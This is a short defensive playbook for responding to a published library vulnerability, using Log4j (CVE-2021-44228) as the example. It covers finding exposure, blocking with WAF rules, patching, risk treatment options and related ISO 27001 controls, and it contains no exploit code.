# Context
A vulnerability in a widely used open source library is published.

This is based on the Log4j vulnerability, december 2021, [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)

Log4j is a Java library maintained by the Apache Foundation, and the most popular logging library for Java.

The vulnerability is: user input containing JNDI Lookups is allowed, will be logged and evaluated, making an RCE attack possible. Disabling logging, while as a rule undesirable, plugs the hole.
Source: https://logging.apache.org/log4j/2.x/

This vulnerability allows an attacker to run commands from a web server, unauthenticated (i.e. without needing to login).

# Steps

## 1. Identifying exposure
- search your source code repositories for the name of the library
- use dependency tools (also called Software Composition Analysis or SCA) to identify indirect use of the affected library , like GitHub's dependencyGraph, Snyk,[OWASP Dependency-Check](https://owasp.org/www-project-dependency-check/), White source, etc.
- not all versions may be affected, so check which version of the library you are using
- find out if you are actually deploying the code that uses the vulnerability; if not, mark the code as "do not deploy". If it has, find out where.

## 2. Stopping the gap
- If the vulnerability is deployed behind a Web Application Firewall (WAF) or Content Delivery Network (CDN), or if you are using Runtime Application Self-Protection (RASP), add the rules your vendor provides to prevent RCE. 
- If your vendor doesn't have rules available, search for them on the internet or write regex that blocks the attack. 
- Monitor to make shure it's working.
- Update/patch the library containing the vulnerability as soon as it becomes available. 

## 3. If you can't stop the gap
Do an impact analyses and identify a treatment:
- Option 1: Accept the Risk, keep monitoring the situation, spend your efforts on releasing the upgraded version of your software a.s.a.p.
- Option 2: Avoid the risk, by shutting down the vulnerable systems immediately — In this example (log4j), stop logging temporarily. 
- Option 3: Mitigate the risk, by going through your code base, remove the dependency and comment out the code that calls it (uncomment it when the upgrade/patch has been applied). 


## Relevant ISO 27001 controls
The main control of interest here is [ISO 27001 A 12.6.1 Management of technical vulnerabilities](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.6.1%20Management%20of%20technical%20vulnerabilities.md), which ensures timely awareness of vulnerabilities through [ISO 27001 A 6.1.4 Contact with special interest groups](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%206.1.4%20Contact%20with%20special%20interest%20groups.md), evaluation of an organization’s exposure, and having set [ISO 27001 A 16.1.1 Responsibilities and procedures](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2016.1.1%20Responsibilities%20and%20procedures.md) to enable a quick and effective response.

Stopping the gap:
- [[ISO 27001 A 13.1.1 Network controls]]
- [[ISO 27001 A 13.1.2 Security of network services]]
- [ISO 27001 A 12.5.1 Installation of software on operational systems](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.5.1%20Installation%20of%20software%20on%20operational%20systems.md)

Preventative measures:
- [ISO 27001 A 12.6.2 Restrictions on software installation](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.6.2%20Restrictions%20on%20software%20installation.md)
- [[ISO 27001 A 14.1.1 Information security requirements analysis and specification]]
- [[ISO 27001 14.2.1 Secure development policy]]
- [[ISO 27001 A 14.2.7 Outsourced development]]
- [ISO 27001 A 18 Compliance](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2018%20Compliance.md) of systems